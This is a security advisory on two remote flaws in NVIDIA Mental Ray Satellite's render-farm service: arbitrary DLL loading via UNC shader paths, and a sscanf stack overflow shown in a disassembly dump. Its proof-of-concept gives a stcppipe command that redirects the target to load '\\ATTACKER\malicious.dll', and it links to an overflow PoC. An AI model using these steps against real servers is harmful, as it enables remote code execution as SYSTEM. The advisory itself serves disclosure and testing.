###################################################################### Product NVIDIA Mental Ray Distributed Bucket Rendering used in Autodesk software like 3ds Max and Maya http://www.nvidia.com/object/nvidia-mental-ray.html Versions <= Platforms Windows, possibly Linux too Vulnerability A] arbitrary dll loading B] stack-based buffer-overflow Attack surface remote Protocol custom on port 7517 (Windows 3ds Max) Date 25 Jan 2013 - found 10 Dec 2013 - paper released Author Luigi Auriemma ####################################################################### ============ Introduction ============ Mental Ray is a rendering engine owned by NVIDIA and used for the production of high quality movies and animations. Its satellite version adopted in distributed rendering (render farms) is also available as plugin in Autodesk software like 3ds Max as a SYSTEM service automatically started at runtime. On Windows raysat_3dsmax2014_64server.exe listens on the TCP port and raysat_3dsmax2014_64.exe is spawned for each incoming connection. Depending by the version the service may also have names like raysat_3dsmax2013_32server.exe and raysat_3dsmax2013_32.exe, and so on. Notes: - SYSTEM service - DEP and ASLR supported - the new process for each connection allows endless exploit tentatives ####################################################################### ============= Vulnerability ============= Please note that these vulnerabilities have been discussed in the following paper: https://revuln.com/files/ReVuln_Nvidia_mental_ray.pdf This security advisory is only a personal note with information about how to test the issues. ------------------------ A] Arbitrary dll loading ------------------------ Mental Ray Satellite allows the client to specify the shaders to load for performing the rendering. A shader is just a dll residing on the server, an attacker can choose what arbitrary libraries to load on the remote host because it's possible to specify any arbitrary path include UNC ones like \\server\folder\file.dll. ------------------------------ B] Stack-based buffer-overflow ------------------------------ The first part of the protocol used by the Mental Ray Satellite is composed by a 4 bytes signature followed by 7 numbers and a string that contains the version of the remote host. The parsing of these parameters is performed through the usage of sscanf without a size limiter for the handling of the string one which is placed in a small buffer located on the stack. The following is a dump from raysat_3dsmax2013_32.exe 0040C2C0 /$ 55 PUSH EBP ; raysat_3dsmax2013_32.0040C2C0(guessed Arg1) 0040C2C1 |. 8BEC MOV EBP,ESP 0040C2C3 |. 83E4 F8 AND ESP,FFFFFFF8 ; QWORD (8.-byte) stack alignment 0040C2C6 |. 6A FF PUSH -1 0040C2C8 |. 68 CDAFE500 PUSH 00E5AFCD ; Entry point 0040C2CD |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0] 0040C2D3 |. 50 PUSH EAX 0040C2D4 |. 64:8925 00000000 MOV DWORD PTR FS:[0],ESP ; SE handler 0040C2DB |. 81EC 38050000 SUB ESP,538 ... 0040CAC8 |> 8D9424 C0040000 LEA EDX,[ESP+4C0] 0040CACF |. 52 PUSH EDX 0040CAD0 |. 8D4424 40 LEA EAX,[ESP+40] 0040CAD4 |. 50 PUSH EAX 0040CAD5 |. 8D4C24 34 LEA ECX,[ESP+34] 0040CAD9 |. 51 PUSH ECX 0040CADA |. 8B0CBD 60782001 MOV ECX,DWORD PTR DS:[EDI*4+1207860] 0040CAE1 |. 8D5424 44 LEA EDX,[ESP+44] 0040CAE5 |. 52 PUSH EDX 0040CAE6 |. 8D4424 40 LEA EAX,[ESP+40] 0040CAEA |. 50 PUSH EAX 0040CAEB |. 83C1 0C ADD ECX,0C 0040CAEE |. 51 PUSH ECX 0040CAEF |. 8D5424 34 LEA EDX,[ESP+34] 0040CAF3 |. 52 PUSH EDX 0040CAF4 |. 8D4424 3C LEA EAX,[ESP+3C] 0040CAF8 |. 50 PUSH EAX 0040CAF9 |. 8D4C24 64 LEA ECX,[ESP+64] 0040CAFD |. 68 54FBEB00 PUSH OFFSET 00EBFB54 ; ASCII "%05d %05d %05d %05d %05d %05d %05d %s" 0040CB02 |. 51 PUSH ECX 0040CB03 |. FF15 1494EB00 CALL DWORD PTR DS:[<&MSVCR100.sscanf>] ####################################################################### ================ Proof-of-Concept ================ A] A quick example for testing the bug using 3ds Max or other clients, the connection will pass through the stcppipe tool that will replace the original DLL name with the new one residing on the attacker's computer: - download and run the following tool: http://aluigi.org/mytoolz/stcppipe.zip stcppipe -s "base.dll" "\\ATTACKER\malicious.dll" SERVER 7517 1234 where SERVER is the hostname or IP of the target and ATTACKER is the host reachable via SMB protocol or WebDav (your computer). - select the following option from the 3ds Max menu: Rendering -> Render Setup -> Processing -> Distributed Bucket Rendering - activate "Distributed Render" - click on "Add" and insert Port 1234 and IP B] http://aluigi.org/poc/raysat_bof.zip #######################################################################